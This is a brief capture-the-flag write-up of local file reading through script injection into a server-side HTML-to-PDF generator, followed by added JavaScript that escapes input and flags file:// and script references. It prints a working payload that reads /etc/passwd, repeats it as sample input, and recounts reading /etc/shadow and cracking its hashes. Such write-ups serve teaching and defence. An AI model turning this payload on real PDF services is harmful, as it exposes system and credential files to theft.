Tags: html pdf xxe lfi
Payload used:
```html
<script>
x=new XMLHttpRequest;
x.onload=function(){
document.write(this.responseText)
};
x.open("GET","file:///etc/passwd");
x.send();
</script>
```
This rendered the /etc/passwd file.
Then I tried to open the shadow file, where all the passwords are stored in Linux.

Fortunately, the /etc/shadow file rendered.

I cracked the hash with john, then logged in with the username and password I got from john and got the flag.
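
On the defending side, the payload only works because user-supplied markup reaches the server-side HTML-to-PDF renderer as live HTML. The following is an added example, not part of the original writeup or the challenge's code: it escapes the input before it is placed in the document handed to the renderer. The function names, the template and the CSP meta tag (which helps only if the renderer honours CSP) are assumptions.

```javascript
// Added example: neutralise untrusted input before server-side PDF rendering.
// All names here are hypothetical; adapt the template to the real application.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Escape every character that can open a tag or break out of an attribute.
function escapeHtml(untrusted) {
  return String(untrusted).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Build the HTML given to the renderer. User text appears only as escaped
// text content, never as markup.
function buildPdfHtml(userText) {
  return [
    "<!DOCTYPE html>",
    '<html><head><meta charset="utf-8">',
    // Defence in depth (assumption: the renderer enforces CSP from <meta>).
    "<meta http-equiv=\"Content-Security-Policy\" content=\"default-src 'none'\">",
    "</head><body><pre>",
    escapeHtml(userText),
    "</pre></body></html>",
  ].join("\n");
}

// Logging aid: flag submissions that reference the file: scheme so they can
// be reviewed. This is a signal for alerting, not a substitute for escaping.
function referencesLocalFile(userText) {
  return /\bfile:\/\//i.test(String(userText));
}

// True if the final document still contains an executable script element.
function containsLiveScript(html) {
  return /<script\b/i.test(html);
}

// Constructed sample input with the same shape as the payload in the writeup.
const samplePayload =
  '<script>x=new XMLHttpRequest;x.open("GET","file:///etc/passwd");x.send();</script>';

const rendered = buildPdfHtml(samplePayload);
console.log("flagged for review:", referencesLocalFile(samplePayload));
console.log("live script in output:", containsLiveScript(rendered));
```

Escaping removes the script execution; the renderer itself should additionally run without local file access and as an unprivileged user, since reading /etc/shadow requires elevated privileges.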

References:
https://blog.noob.ninja/local-file-read-via-xss-in-dynamically-generated-pdf/